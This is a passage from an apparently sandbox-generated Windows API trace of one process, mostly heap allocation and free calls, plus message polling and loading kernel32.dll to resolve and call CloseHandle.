lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0091.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0091.924] FreeLibrary (hLibModule=0x772d0000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0091.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0091.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0091.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0091.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0091.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0091.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0091.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0091.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0091.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0091.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0091.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0091.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0091.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0091.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0091.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0091.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0091.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0091.972] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0091.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0091.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0091.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0091.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0091.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0091.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0091.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0091.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0091.973] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0091.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0091.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0091.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0091.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0091.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0091.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0091.973] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0091.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0091.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0091.973] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0091.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0091.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0091.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0091.973] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0091.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0091.974] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0091.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0091.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0091.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0091.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0091.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0091.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0091.974] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0091.974] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0092.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0092.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0092.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0092.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0092.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0092.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e400 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0092.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0092.021] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0092.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0092.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0092.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0092.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0092.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0092.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0092.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0092.022] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0092.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0092.022] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0092.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0092.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0092.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0092.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0092.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0092.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0092.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0092.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0092.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0092.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0092.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0092.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0092.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0092.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0092.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0092.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0092.023] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0092.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0092.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0092.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0092.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0092.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0092.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0092.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0092.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0092.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0092.024] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0092.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0092.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0092.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1a8 [0092.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca1a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0092.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0092.024] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0092.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0092.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0092.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0092.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0092.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0092.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0092.025] CloseHandle (hObject=0x258) returned 1 [0092.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0092.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0092.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0092.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0092.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0092.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0092.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0092.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0092.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0092.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0092.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0092.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0092.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0092.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0092.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0092.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0092.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0092.026] FreeLibrary (hLibModule=0x772d0000) returned 1 [0092.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0092.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0092.026] RtlAllocateHeap 